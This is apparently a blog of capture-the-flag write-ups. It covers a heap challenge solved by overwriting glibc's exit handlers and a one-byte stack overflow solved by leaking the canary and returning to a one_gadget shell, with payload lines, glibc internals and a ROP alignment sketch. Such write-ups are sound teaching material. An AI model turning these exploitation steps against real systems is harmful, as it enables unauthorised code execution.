:::note Sometimes a perfect ROP chain still crashes the target. One common cause is stack misalignment: many libc functions require the stack to be 0x10-aligned to accommodate SIMD instructions. Adding a single ret gadget before your chain shifts the stack by 0x08, fixing the alignment. :::

Now, when main returns, system("/bin/sh") is executed, giving us a shell.
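To see why the extra ret matters, we can lay the chain out in Python and track rsp. This is a sketch with hypothetical addresses: only the 0x10f75b gadget offset comes from the exploit above (and it is specific to the challenge's libc), the other offsets are made up, and the return-address slot is a hypothetical value ending in 8, as implied by the -0x08 alignment adjustment.

```python
import struct


def p64(value: int) -> bytes:
    """Equivalent of pwntools' p64(): 64-bit little-endian packing."""
    return struct.pack("<Q", value)


libc_base = 0x7FFFF7C00000             # hypothetical
pop_rdi = libc_base + 0x10F75B         # bytes 5f c3: pop rdi; ret
ret = pop_rdi + 1                      # skipping the 5f leaves a lone ret (c3)
binsh = libc_base + 0x1CB42F           # hypothetical "/bin/sh" offset
system = libc_base + 0x58750           # hypothetical system() offset

# The fake chunk starts 8 bytes below main's return-address slot, so the
# first qword fills the slot below it and the chain begins at the return address.
chain = p64(0) + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system)


def rsp_at_system_entry(ret_slot: int, extra_ret: bool) -> int:
    """rsp when system() starts: every ret/pop in the chain consumes 8 bytes."""
    popped = [pop_rdi, binsh] + ([ret] if extra_ret else []) + [system]
    return ret_slot + 8 * len(popped)


ret_slot = 0x7FFFFFFFE3A8              # hypothetical, ends in 8 like in the exploit
for extra in (False, True):
    rsp = rsp_at_system_entry(ret_slot, extra)
    # The SysV ABI expects rsp % 16 == 8 at function entry (right after a call).
    print(f"extra ret={extra}: rsp % 16 = {rsp % 16}")
```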

Babyheap: JustCTF - Chapter 2

David Hermes — Tue, 21 Oct 2025 00:00:00 GMT

Let's tackle the next chapter of babyheap, this one is a bit more exotic...

scanf and black magic

Let’s examine the menu’s scanf input function.
Question: how can you send it an arbitrarily long number without triggering a buffer overflow?
Answer: it uses the heap.

Ocean of scanf

//babyheap main function
printf("Menu:\n1) Create\n2) Read\n3) Update\n4) Delete\n0) Quit\n> ");
if ( (unsigned int)__isoc99_scanf(" %d", &v4) != 1 )
{
	puts("Invalid input");
	exit(0);
}

But if scanf() always uses the heap, why don't we see tcache chunks in the free list after every execution? To understand what is going on, let's start gdb and set a breakpoint at *malloc. If we send 42 to scanf, malloc doesn't get called, but when we send a very big number, the program breaks at a malloc call! Using finish, we can return from malloc and see which function called it:

   0x7ffff7ca9a3b <__GI___libc_scratch_buffer_grow_preserve+107>:       call   QWORD PTR [rip+0x15f597]        # 0x7ffff7e08fd8 (malloc)
=> 0x7ffff7ca9a41 <__GI___libc_scratch_buffer_grow_preserve+113>:       mov    rdi,rax

__libc_scratch_buffer_grow_preserve() is our culprit, then. But let's step back and follow the implementation of vfscanf(): after parsing "%d", vfscanf enters a loop that, on every iteration, takes a character from stdin using inchar() and appends it to a character buffer by calling char_buffer_add(), until it finds EOF or the width drops to zero.

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1823

while (c != EOF && width != 0)
{
	... a LOT of stuff ...	
	
	char_buffer_add (&charbuf, c);   // <-- wrapper around a wrapper around grow_preserve
	if (width > 0)
		--width;

	c = inchar ();
}

It then appends a NUL byte to terminate the string and calls __strtol_internal, which converts the string into a long integer.

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1932

/* Convert the number.  */
char_buffer_add (&charbuf, L_('\0'));
if (char_buffer_error (&charbuf))
{
  ... error stuff ...
}
if (need_longlong && (flags & LONGDBL))
{
  ... if a longlong is needed stuff ...
}
else
{
  if (flags & NUMBER_SIGNED)
    num.l = __strtol_internal                                    //<-- HERE
      (char_buffer_start (&charbuf), &tw, base, flags & GROUP);
  else
    num.ul = __strtoul_internal
      (char_buffer_start (&charbuf), &tw, base, flags & GROUP);
}

But didn't we ask for an int by using "%d"? Why is the string converted into a long integer? Don't worry: shortly after the code above, the number is cast to the right type and stored into the argument given to scanf():

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1961
 
if (!(flags & SUPPRESS))
{
	if (flags & NUMBER_SIGNED)
	{
	  if (need_longlong && (flags & LONGDBL))
		*ARG (LONGLONG int *) = num.q;
	  else if (need_long && (flags & LONG))
		*ARG (long int *) = num.l;
	  else if (flags & SHORT)
		*ARG (short int *) = (short int) num.l;
	  else if (!(flags & CHAR))
		*ARG (int *) = (int) num.l;                    //<-- long to int and stored in the
	  else                                             //    argument given to scanf
		*ARG (signed char *) = (signed char) num.ul;
	}
	else
	{
	  ... same as above but unsigned ...
	}
	
	... more stuff...
}

Now we know how the input is turned into an integer. But we skipped a key aspect of this code: char_buffer_add() moves characters from stdin into a buffer, so let's see how it works. It appends directly into the buffer while there is room and falls back to char_buffer_add_slow() when the buffer is full; the storage behind it is a scratch_buffer:

//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/include/scratch_buffer.h#L66
struct scratch_buffer {
  void *data;    /* Pointer to the beginning of the scratch area.  */
  size_t length; /* Allocated space at the data pointer, in bytes.  */
  union { max_align_t __align; char __c[1024]; } __space;
};

This struct contains a pointer to the buffer currently in use (data), the length of that buffer (length), and a 1024-byte inline memory area (__space). When the scratch_buffer is initialized, data points to __space. If more than 1024 bytes must be stored, char_buffer_add_slow() calls __libc_scratch_buffer_grow_preserve(), which allocates a new heap buffer of double the size, copies the old contents over, and updates data and length. This is why malloc is called only when big numbers are sent to scanf: we need more than 1024 characters (counting the terminating NUL) to trigger the heap allocation.

//glibc internals
bool
__libc_scratch_buffer_grow_preserve (struct scratch_buffer *buffer)
{
  size_t new_length = 2 * buffer->length;    // <-- 1024 * 2 on the first call
  void *new_ptr;

  if (buffer->data == buffer->__space.__c)
    {
      /* Move buffer to the heap.  No overflow is possible because
         buffer->length describes a small buffer on the stack.  */
      new_ptr = malloc (new_length);           // <-- HERE IS WHERE WE BREAK
      if (new_ptr == NULL)
        return false;
      memcpy (new_ptr, buffer->__space.__c, buffer->length);
    }
  else
    {
      /* Buffer was already on the heap.  Check for overflow.  */
      if (__glibc_likely (new_length >= buffer->length))
        new_ptr = realloc (buffer->data, new_length);
      else
        {
          ... error stuff ...
        }

      if (__glibc_unlikely (new_ptr == NULL))
        {
          /* Deallocate, but buffer must remain valid to free.  */
          free (buffer->data);
          scratch_buffer_init (buffer);
          return false;
        }
    }

  /* Install new heap-based buffer.  */
  buffer->data = new_ptr;
  buffer->length = new_length;
  return true;
}
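The growth rule is easy to model. The Python sketch below is a simplified, hypothetical model of the heap calls a %d conversion makes for a run of digits: it only counts the digits plus the terminating NUL and ignores signs, whitespace and field widths.

```python
SCRATCH_INLINE = 1024   # sizeof(scratch_buffer.__space)


def scanf_heap_calls(n_digits: int) -> list:
    """Simplified model of the heap calls a %d conversion makes for n_digits.

    Each digit and the final NUL go through char_buffer_add(); the buffer
    starts as the 1024-byte inline area and doubles whenever it is full.
    """
    needed = n_digits + 1          # digits + NUL terminator
    length = SCRATCH_INLINE
    calls = []
    while needed > length:
        length *= 2                # new_length = 2 * buffer->length
        calls.append(("malloc" if not calls else "realloc", length))
    return calls


print(scanf_heap_calls(len("42")))   # []
print(scanf_heap_calls(0x500))       # [('malloc', 2048)]
```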

Now we know when scanf calls malloc, but how does this help us leak a libc pointer? The scratch buffer is freed right after use, so how can we get a freed chunk to stay in the small or large bins? It seems that our deep dive is not finished yet... enter the depths of malloc.

Deep into malloc

Looking at the malloc() implementation inside libc, we notice that if the requested chunk size is outside the smallbin range and there are chunks in the fastbins, malloc_consolidate() is called.

//glibc internals
static void *
_int_malloc (mstate av, size_t bytes)
{
	INTERNAL_SIZE_T nb;               /* normalized request size */
	
	... too much stuff here, like a loooot ...
	
	if (in_smallbin_range (nb))
	{
	    ... a bit of stuff here ...
	} 
    else
    {
	    /*
	     If this is a large request, consolidate fastbins before continuing.
	     While it might look excessive to kill all fastbins before
	     even seeing if there is space available, this avoids
	     fragmentation problems normally associated with fastbins.
	     [...]
		*/
		
	    idx = largebin_index (nb);
	    if (have_fastchunks (av))
        malloc_consolidate (av);     //<--- oh look, malloc_consolidate
    }
    
    ... a league of legends lootbox full of stuff here ...
}

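The macro in_smallbin_range(nb) simply checks whether a chunk size is small enough for the smallbins. From the definitions below, on x86-64 SMALLBIN_CORRECTION is 0 and MIN_LARGE_SIZE works out to 64 * 16 = 0x400: chunk sizes below 0x400 are in smallbin range (the largest smallbin holds 0x3f0-byte chunks), while 0x400 and above count as large requests.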

//glibc internals
#define NBINS             128
#define NSMALLBINS         64
#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT   /* normally 16 */
#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > CHUNK_HDR_SZ)
#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)

#define in_smallbin_range(sz)  \
  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
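Plugging in the x86-64 values (MALLOC_ALIGNMENT = 16, CHUNK_HDR_SZ = 16, so SMALLBIN_CORRECTION = 0) gives the threshold directly. Here is a Python transcription of the macros, with a simplified request2size to check the 2048-byte scanf buffer; it is a sketch under those x86-64 assumptions.

```python
MALLOC_ALIGNMENT = 16                     # x86-64
CHUNK_HDR_SZ = 16                         # 2 * SIZE_SZ
NSMALLBINS = 64
SMALLBIN_WIDTH = MALLOC_ALIGNMENT
SMALLBIN_CORRECTION = int(MALLOC_ALIGNMENT > CHUNK_HDR_SZ)   # 0 here
MIN_LARGE_SIZE = (NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH


def in_smallbin_range(sz: int) -> bool:
    return sz < MIN_LARGE_SIZE


def request2size(req: int) -> int:
    """Simplified request2size for x86-64 (8-byte header, 16-byte alignment)."""
    return max(0x20, (req + 8 + 15) & ~15)


print(hex(MIN_LARGE_SIZE))                                            # 0x400
print(in_smallbin_range(0x3F0), in_smallbin_range(0x400))             # True False
print(hex(request2size(2048)), in_smallbin_range(request2size(2048)))  # 0x810 False
```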

So what happens if we request a chunk of 0x400 bytes or more? To answer that, we need to understand what malloc_consolidate does.

:::note malloc_consolidate() in glibc is a function that coalesces freed chunks from the fastbins and moves them into the unsortedbin. Normally, when a small chunk is freed and doesn't enter the tcache, it goes into a fastbin without being merged with adjacent free chunks, to keep free() fast. Over time, this can fragment memory. When malloc() needs a lot of space (for example, for a largebin-sized request), it calls malloc_consolidate(). :::

This means that if we put a chunk into a fastbin and somehow trigger malloc_consolidate, that chunk gets moved out of the fastbin and can end up in a smallbin, even though it's a small chunk. Reading this chunk gives us a libc leak. But as we discovered before, to execute malloc_consolidate we need to allocate a chunk of size 0x400 or greater, and this is where our scanf trick comes in handy.

Putting it all together.

We start by generating eight chunks (7 tcache + 1 fastbin) and free them in a particular order to guarantee that the fastbin chunk is not the last one in heap memory. Else, the fastbin chunk would simply be trimmed by malloc_consolidate.

Now we can apply what we learned about scanf and malloc: we make scanf allocate a buffer that is bigger than the smallbin max size, so that malloc_consolidate() gets triggered. To achieve this we can send b"1"*0x500 to scanf: this is bigger than 0x400, so both scratch_buffer_grow_preserve() and malloc_consolidate() get triggered. The fastbin chunk gets moved to the unsorted bin, and then into the smallbin list once the big chunk gets freed after scanf returns.

By using chunk_read() on the first chunk we can leak the libc address!!!

Exploiting with exit_func overwrite

Looking at the exit() function, we notice that it is only a wrapper around __run_exit_handlers().

//glibc internals
void exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}

This function executes so-called exit_functions saved into the __exit_funcs global structure. Exit functions can also be registered by the user using atexit().

//example snippet
#include <stdio.h>
#include <stdlib.h>

void cleanup1(void) { puts("cleanup1"); }
void cleanup2(void) { puts("cleanup2"); }

int main(void) {
    atexit(cleanup1);
    atexit(cleanup2);
    printf("Exiting...\n");
    return 0; // triggers cleanup2 then cleanup1
}

So, what exactly is an exit_function?
Looking at the code below, we can see that an exit_function is a struct that wraps a function call. The flavor field indicates that there are multiple types of exit functions that take different combinations of arguments.

//glibc internals
struct exit_function
  {
    long int flavor;
    union
    {
		void (*at) (void);
		struct
		{
		    void (*fn) (int status, void *arg);
		    void *arg;
		} on;
		struct
		{
		    void (*fn) (void *arg, int status);
		    void *arg;
		    void *dso_handle;
		} cxa;
    } func;
  };

Looking at the __run_exit_handlers() snippet below, we can see how the flavors change the execution of an exit function:

ef_free: slot is dead, ignore
ef_us: nothing happens
ef_on: status code as first argument and user supplied argument as second one
ef_at: function without arguments
ef_cxa: the important one, first argument is user supplied and second one is the status code.
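In glibc the flavors are plain enum constants numbered from zero in the order ef_free, ef_us, ef_on, ef_at, ef_cxa, which is why an ef_cxa entry shows up as 4 in a memory dump. A small Python mirror (the class name is my own, hypothetical) can be handy when parsing dumped entries:

```python
from enum import IntEnum


class ExitFlavor(IntEnum):
    """Mirror of glibc's exit_function flavor enum (values start at zero)."""
    EF_FREE = 0  # slot is dead
    EF_US = 1    # slot in use, nothing to call yet
    EF_ON = 2    # fn(status, arg), registered by on_exit()
    EF_AT = 3    # fn(), no arguments
    EF_CXA = 4   # fn(arg, status), registered by __cxa_atexit()


print(ExitFlavor(4).name)  # EF_CXA
```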

:::note By looking at the example above you might think that atexit() registers ef_at functions, but in glibc atexit() is a thin wrapper around __cxa_atexit(), so it actually registers ef_cxa entries with a NULL argument. If you want to register ef_on functions, there is a GNU extension called on_exit(). :::

Question: Why is ef_cxa the best flavor?
Answer: We can overwrite the function pointer with system() and set the first argument to a pointer to /bin/sh.

//glibc internals
void __run_exit_handlers (int status, struct exit_function_list **listp,
			bool run_list_atexit, bool run_dtors)
{

...

while (cur->idx > 0)
	{
	struct exit_function *const f = &cur->fns[--cur->idx];
	const uint64_t new_exitfn_called = __new_exitfn_called;
	
	__libc_lock_unlock (__exit_funcs_lock);
	switch (f->flavor)
	{
		void (*atfct) (void);
		void (*onfct) (int status, void *arg);
		void (*cxafct) (void *arg, int status);
		
		case ef_free:
		case ef_us:
			break;
	    case ef_on:
			onfct = f->func.on.fn;
			PTR_DEMANGLE (onfct);   // stored pointers are mangled
			onfct (status, f->func.on.arg);
			break;
	    case ef_at:
			atfct = f->func.at;
			PTR_DEMANGLE (atfct);
			atfct ();
			break;
	    case ef_cxa:
			f->flavor = ef_free;
			cxafct = f->func.cxa.fn;
			PTR_DEMANGLE (cxafct);
			cxafct (f->func.cxa.arg, status); // <-- cxa is executed here 
			break;
	}
	  __libc_lock_lock (__exit_funcs_lock);
	  if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
	    goto restart;
	}

...

}

Putting it all together

In practice, we are going to inspect the exit handler array entries, look for an exit handler with flavor == 4 (ef_cxa) to overwrite with a pointer to system(), and then set a pointer to /bin/sh as its first argument. Getting a shell from there is as easy as letting the program exit.

Step 1: Getting the __exit_funcs struct

Using the libc leak obtained before, we get the address of the exit function list by adding its offset to the libc base address. __exit_funcs points to a static list with the symbol initial; if more functions are registered than it can hold, bigger lists are allocated to extend it, but initial is the first list and always exists:

__exit_funcs = libc_base + libc.symbols.initial

We then overwrite the first tcache chunk's forward pointer with this address; remember that when malloc() returns a chunk, the first 16 bytes get zeroed out. After calling malloc() twice, the second call returns a pointer to the initial struct, and now we can read and edit it.

pwndbg> tele 0x7f3046204fc0 <-- libc_base + initial offset
00:0000│  0x7f3046204fc0 (initial) ◂— 0
01:0008│  0x7f3046204fc8 (initial+8) ◂— 1 <-- number of registered funcs
02:0010│  0x7f3046204fd0 (initial+16) ◂— 4 <-- flavor
03:0018│  0x7f3046204fd8 (initial+24) ◂— 0x91b97d6d433887e0 <-- function addrs
04:0020│  0x7f3046204fe0 (initial+32) ◂— 0 <-- argument
... ↓     3 skipped

Looking at the pwndbg output above, we notice only one entry in the array. Fortunately it is an ef_cxa entry, so we only need to replace its function with system().

Step 2: Replacing function with system()

Do you notice something wrong with the function address in the snippet above? That's not an address. When an atexit function gets registered, its address is XORed with a key called pointer_chk_guard and then rotated left by 17 bits (0x11).
$$ \text{mangled\_address} = \texttt{rol}(\text{address} \oplus \text{key},\ \text{0x11}) $$

$$ \text{address} = \texttt{ror}(\text{mangled\_address},\ \text{0x11}) \oplus \text{key} $$

Since XOR is its own inverse, performing a ROR (rotate right) by 0x11 bits on the mangled address and then XORing the result with the real address recovers the key:

$$ \text{key} = \texttt{ror}(\text{mangled\_address},\ \text{0x11}) \oplus \text{address} $$

Once we have the key, we can replace the old mangled function address with the mangled system() address and overwrite the argument (currently 0) with a pointer to a /bin/sh\0 string.
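The same formulas as a Python sketch. The rotation helpers are written out by hand so the snippet runs without pwntools, and the key and address values in the round trip are made up:

```python
MASK64 = (1 << 64) - 1


def rol64(x: int, n: int) -> int:
    """Rotate a 64-bit value left by n bits."""
    n %= 64
    return ((x << n) | (x >> (64 - n))) & MASK64


def ror64(x: int, n: int) -> int:
    """Rotate a 64-bit value right by n bits."""
    return rol64(x, 64 - (n % 64))


def mangle(addr: int, key: int) -> int:
    """x86-64 pointer mangling: XOR with the guard, then rotate left by 0x11."""
    return rol64(addr ^ key, 0x11)


def demangle(mangled: int, key: int) -> int:
    """Inverse: rotate right by 0x11, then XOR with the guard."""
    return ror64(mangled, 0x11) ^ key


def recover_key(mangled: int, addr: int) -> int:
    """Recover pointer_chk_guard from one mangled/plain pointer pair."""
    return ror64(mangled, 0x11) ^ addr


# Round trip with made-up values (not taken from the challenge)
key = 0x1122334455667788
fn = 0x7F3046001234
m = mangle(fn, key)
assert demangle(m, key) == fn
assert recover_key(m, fn) == key
```

With the key recovered from the real/mangled pair, mangle(system_addr, key) (system_addr being a hypothetical name for the resolved system() address) is the value to write into the fn slot.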

But how do we get the unmangled address to recover the key?
Set a breakpoint at exit() and let the program hit it, then step until you find the ROR and XOR instructions. Once the runtime has demangled the function pointer, you can read the real pointer. Unfortunately, in our case the registered function does not live in libc but in the dynamic loader (ld), so its address is relative to the loader base. Fortunately, libc contains pointers into the loader mapping: you can find them with p2p libc ld and use them to resolve the loader base.

Using the same tcache poisoning technique we applied to read and modify the exit function array, we can also leak the loader’s address.
We'll use the last pointer in the output of p2p: malloc() writes into the allocated area before we are able to read it, so we need a leak stored in writable memory.
Once again, we overwrite the first tcache chunk’s forward pointer with this address, allocate two chunks, and then read from the second one to obtain the loader leak.

:::note The pointer_chk_guard is an element of the Thread Control Block (TCB) stored inside the Thread Local Storage (TLS). TLS is a fixed per-thread storage whose address is saved in a special register. Its position is randomized and very difficult to leak.

The first non-address value you see is our canary (stack_chk_guard, at fs:0x28), recognizable by its trailing zero byte; the value stored directly after it is our key (pointer_chk_guard, at fs:0x30).

But pointer_chk_guard is derived from somewhere else:

When the kernel loads an executable through execve, it writes a key-value structure called the Auxiliary Vector (auxv) into memory. It holds many critical values, which you can print by setting the LD_SHOW_AUXV=1 environment variable.

❯ LD_SHOW_AUXV=1 gdb
AT_SYSINFO_EHDR:      0x7fba40212000
AT_MINSIGSTKSZ:       3376
AT_HWCAP:             0x178bfbff
AT_PAGESZ:            4096
AT_CLKTCK:            100
AT_PHDR:              0x562b9823f040
AT_PHENT:             56
AT_PHNUM:             15
AT_BASE:              0x7fba40214000
AT_FLAGS:             0x0
AT_ENTRY:             0x562b982f3ac0
AT_UID:               1000
AT_EUID:              1000
AT_GID:               1000
AT_EGID:              1000
AT_SECURE:            0
AT_RANDOM:            0x7ffee4809839
AT_HWCAP2:            0x2
AT_EXECFN:            /usr/bin/gdb
AT_PLATFORM:          x86_64
AT_RSEQ_FEATURE_SIZE: 28
AT_RSEQ_ALIGN:        32

Looking at the AT_RANDOM entry, we see that it points to the stack. At initialization the kernel copies 16 bytes of kernel entropy onto the stack: the first 8 bytes become our canary (with the lowest byte zeroed), the second 8 bytes become our pointer_chk_guard. But why are the values copied into the TCB if they are saved on the stack too? Because every thread needs to access these values. :::
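A sketch of how the two guards fall out of those 16 bytes on little-endian x86-64, assuming glibc's usual derivation (first qword with its lowest byte cleared for the canary, second qword unchanged for the pointer guard). The function name is hypothetical, and this only models the derivation: reading the bytes in an exploit still requires a stack leak.

```python
import os
import struct


def guards_from_at_random(at_random: bytes) -> tuple[int, int]:
    """Derive (stack_chk_guard, pointer_chk_guard) from the 16 AT_RANDOM bytes."""
    first, second = struct.unpack("<QQ", at_random[:16])
    canary = first & ~0xFF   # lowest byte forced to zero (the string terminator)
    return canary, second


canary, ptr_guard = guards_from_at_random(os.urandom(16))
assert canary & 0xFF == 0
```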

Step 3: exiting gracefully

Now we have everything we need to recover the key. After overwriting the struct with the mangled system() address and a pointer to /bin/sh as its argument, we simply need to let the program exit to get a shell.
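As a sketch of what ends up being written, assuming the x86-64 layout seen in the pwndbg dump (next, idx, then fns[0] = flavor, fn, arg, dso_handle), the bytes for the start of initial could be built like this. fake_initial, system_addr and binsh_addr are hypothetical names; in practice the two addresses would come from the libc base plus the system symbol and a "/bin/sh" string, and the key from the recovery in Step 2.

```python
import struct

MASK64 = (1 << 64) - 1
EF_CXA = 4


def rol64(x: int, n: int) -> int:
    """Rotate a 64-bit value left by n bits (0 < n < 64)."""
    return ((x << n) | (x >> (64 - n))) & MASK64


def fake_initial(system_addr: int, binsh_addr: int, key: int) -> bytes:
    """Bytes for the start of glibc's `initial` exit_function_list."""
    mangled_system = rol64(system_addr ^ key, 0x11)
    return struct.pack(
        "<6Q",
        0,               # next: no further lists
        1,               # idx: one registered function
        EF_CXA,          # fns[0].flavor
        mangled_system,  # fns[0].func.cxa.fn, called as fn(arg, status)
        binsh_addr,      # fns[0].func.cxa.arg: pointer to "/bin/sh"
        0,               # fns[0].func.cxa.dso_handle (unused here)
    )
```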

Still have questions about __exit_funcs? Here is a link to a nice blogpost.

echo: Srdnlen Quals 2026

David Hermes — Tue, 03 Feb 2026 00:00:00 GMT

What can you do with a single overflowing byte? Well... first let's look at the security mitigations. You'll notice that this is a completely locked-down binary, but that won't stop us.

Disassembly

There are three important functions in this binary:

main(): simply calls our echo function.
echo(): internally calls read_stdin() and prints the read text on stdout.
read_stdin(): a strange wrapper around the standard read() function.

The main function isn't that significant, so we can skip it for brevity and focus directly on echo().

unsigned __int64 echo()
{
  char buffer[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int8 max_chars; // [rsp+40h] [rbp-10h]
  unsigned __int64 canary; // [rsp+48h] [rbp-8h]

  canary = __readfsqword(0x28u);
  memset(buffer, 0, sizeof(buffer));
  max_chars = 64;
  while ( 1 )
  {
    printf("echo ");
    read_stdin(buffer, max_chars);
    if ( !buffer[0] )
      break;
    puts(buffer);
  }
  return canary - __readfsqword(0x28u);
}

This function does exactly what its name implies: it reads at most 64 bytes from stdin and echoes them back to stdout through puts(buffer). There doesn't seem to be an overflow here, at least not without looking into read_stdin(). Also, that stack canary will definitely be a problem later.

Interestingly, the max_chars variable is declared at the start of the function and stored on the stack. Technically it isn't needed: the developer could have simply passed the constant to read_stdin().

Now let's explore the read_stdin() function:

char *__fastcall read_stdin(char *buffer, unsigned __int8 max_chars)
{
  char *char_ptr; // rax
  unsigned __int8 i; // [rsp+1Fh] [rbp-1h]

  for ( i = 0; i <= max_chars; ++i )
  {
    if ( read(0, &buffer[i], 1uLL) != 1 || buffer[i] == '\n' )
    {
      char_ptr = &buffer[i];
      *char_ptr = 0;
      return char_ptr;
    }
  }
  return char_ptr;
}

This function behaves a little strangely: it iterates up to max_chars + 1 times, reading one byte per iteration. If the byte is a newline, or if read() fails to return a byte, that byte is overwritten by a null byte (\x00) and the function returns. If all max_chars + 1 bytes arrive without a newline, no terminator is written at all.

So think about this scenario: max_chars is set to 64, but the loop lets us read up to 65 bytes (i <= max_chars). If we send exactly 65 As without a newline, we write one byte outside the bounds of the buffer without even writing a nullbyte.
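To see the off-by-one concretely, here is a small Python model of read_stdin() acting on a fake echo() frame (offsets from the decompilation: buffer at rbp-0x50, max_chars at rbp-0x10). It is a simulation, not the binary: running out of input stands in for read() failing, and the unsigned 8-bit counter is not modeled.

```python
def read_stdin_model(stack: bytearray, buf_off: int, max_chars: int, data: bytes) -> None:
    """Model of read_stdin(): i runs from 0 to max_chars *inclusive*."""
    for i in range(max_chars + 1):
        if i >= len(data) or data[i] == ord("\n"):
            stack[buf_off + i] = 0   # newline / failed read -> null terminator
            return
        stack[buf_off + i] = data[i]
    # all max_chars + 1 bytes stored: no terminator is written


frame = bytearray(0x50)          # rbp-0x50 .. rbp-0x1
BUF, MAX_CHARS = 0x00, 0x40      # offsets of buffer and max_chars in the frame
frame[MAX_CHARS] = 64

read_stdin_model(frame, BUF, frame[MAX_CHARS], b"A" * 64 + b"\x48")
print(hex(frame[MAX_CHARS]))     # 0x48: the 65th byte landed on max_chars
```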

But where exactly does the OOB byte land?

One byte to rule them all

Looking at the echo() function we see that the max_chars variable is allocated directly after our buffer on the stack, this is great! With a single byte it is possible to overwrite max_chars with something like 0xFF and get a big buffer overflow.

[rbp-0x50] buffer (64 bytes)  <-- Fills with "A"*64 
[rbp-0x10] max_chars (1 byte) <-- Can be overwritten by "\xFF"

However, we need to choose max_chars precisely! The variable must be exactly the number of bytes we want to write minus one; otherwise a null byte will be added at the end, which could break our exploit.

r.sa(b"echo ", b"A"*64 + b"\x48")

Yet we still have a little hurdle to overcome to get to a return address overwrite: the stack canary.

One byte to leak them

Stack canaries have a nice property (or not, depending on the situation): the first byte in memory (the least significant one) is always a null byte. On one hand it stops us from leaking the canary with a simple print function, because the null byte acts as a string terminator; on the other hand we can simply overwrite that byte without losing any information about the canary.

By overflowing the buffer up to the first byte of the canary, the separation between our string and the canary bytes is lost, so puts() keeps printing until it reaches a null byte. Conveniently, this also leaks the saved RBP.

r.sa(b"echo ", b"A"*64 + b"\x77" + b"B"*7 + b"Z") #0x49 bytes, max_chars must be \x48

[rbp-0x50] buffer (64 bytes)  <-- Fills with "A"*64
[rbp-0x10] max_chars (1 byte) <-- Overwritten by "\x77" (expands loop) 
[rbp-0x0F] padding (7 bytes)  <-- Fills with "B"*7 
[rbp-0x08] canary (8 bytes)   <-- LSB overwritten by "Z"

This will get us:

AAAAA...AAAOBBBBBBBZO\x93;\x11Q_|\xb0\x84D\x80\xfe\x7f
                   |    canary    | Saved Base Pointer |

We can use the Z character as a delimiter to slice the output (this is why we added it), parse the leaked bytes, and reconstruct the canary and the saved RBP.

:::note Remember that the leaked canary will be 7 bytes long, the leading zero byte must be added before unpacking the value with u64(canary_leak). :::
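Parsing that output could look like the sketch below. It assumes the leaked canary contains no null byte (otherwise puts() stops early and the leak must be retried) and that the saved RBP is a 6-byte user-space stack address; parse_leak is a hypothetical helper name.

```python
import struct

MARKER = b"B" * 7 + b"Z"


def parse_leak(out: bytes) -> tuple[int, int]:
    """Extract (canary, saved_rbp) from the puts() output of the 0x49-byte payload."""
    start = out.index(MARKER) + len(MARKER)
    # 7 leaked canary bytes; prepend the null byte we overwrote with "Z"
    canary = struct.unpack("<Q", b"\x00" + out[start:start + 7])[0]
    # saved RBP follows, 6 bytes for a typical 0x7ff... stack address
    rbp_bytes = out[start + 7:start + 13]
    saved_rbp = struct.unpack("<Q", rbp_bytes.ljust(8, b"\x00"))[0]
    return canary, saved_rbp
```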

We are finally ready to overwrite the saved return pointer. But what do we point it to? We need one more leak... a pointer to Libc.

Getting a Libc pointer

Remember that main() is not truly the entrypoint of a C program. If you look at the stack with a debugger right after main() is called, you will see on top of the stack the return address into a function called __libc_start_call_main; as the name suggests, this function lives in the standard library.

00:0000│ rsp 0x7ffc0c2e3678 —▸ 0x7fc4ede2a1ca ◂— mov edi, eax #__libc_start_call_main + ???

We can leak this address exactly like we leaked the canary:

r.sa(b"echo ", b"A"*64 + b"\x5f" + b"b"*7 + b"B"*0x28 + b"C"*7 + b"Z") #0x78 bytes, max_chars must be \x77

[rbp-0x50] buffer (64 bytes)   <-- Fills with "A"*64
[rbp-0x10] max_chars (1 byte)  <-- Overwritten by "\x5f"
[rbp-0x0F] padding (7 bytes)   <-- Fills with "b"*7 
[rbp-0x08] canary (8 bytes)    <-- Fills with "B"s
[rbp-0x00] saved RBP (8 bytes) <-- Fills with "B"s
[rbp+0x08] saved RIP (8 bytes) <-- Fills with "B"s
[rbp+0x10] *argv (8 bytes)     <-- Fills with "B"s
[rbp+0x18] argc (4 bytes)      <-- Fills with "B"s
[rbp+0x1c] padding (4 bytes)   <-- Fills with "B"s
[rbp+0x20] main's saved RBP (8 bytes) <-- Fills with 7 "C"s and one "Z"
[rbp+0x28] main's return address      <-- Leaked: points into __libc_start_call_main

One byte to bring them all

Now we have everything we need. Here is the final exploitation path: We overflow the buffer all the way down to the return address. Along the way, we carefully replace the canary and the base pointer with the values we leaked earlier, acting as if nothing ever happened so the canary check succeeds. Finally, we overwrite the return address to redirect execution to a one_gadget in Libc to get a shell.

Finding the right Libc version

To find the correct libc version on the remote server, libc.blukat.me is our best friend. We can input our leaked libc address and its symbol name to find all libc versions that match that offset. But what symbol should we query for? The function's name is __libc_start_call_main, but the leak gives us an address somewhere in the middle of it. Fortunately, we can query __libc_start_main_ret for exactly this scenario.

It is often helpful to download the newest matched version and, if it doesn't work, look at the older ones. Using the one_gadget utility from your shell (or directly inside pwndbg), we can get a working gadget.

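Now we can send the last echo command! Its first byte is a null byte, so the if ( !buffer[0] ) check in echo() breaks the loop, the restored canary passes the check, and the function returns into our gadget.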

r.sa(b"echo ", b"\0"*72 + p64(canary_l) + p64(stack_l + 0x8) + p64(libc_l + 0xef52b))

:::note When you have a buffer overflow and control the RBP, you can often make "unusable" one_gadgets viable. For example, the gadget in this exploit requires [rbp-0x78] == NULL. By intentionally moving the RBP and padding our overflow with null bytes, we satisfy the gadget's constraints and successfully trigger a shell! :::

[rbp-0x50] buffer + others (72 bytes)   <-- Fills with "\0"
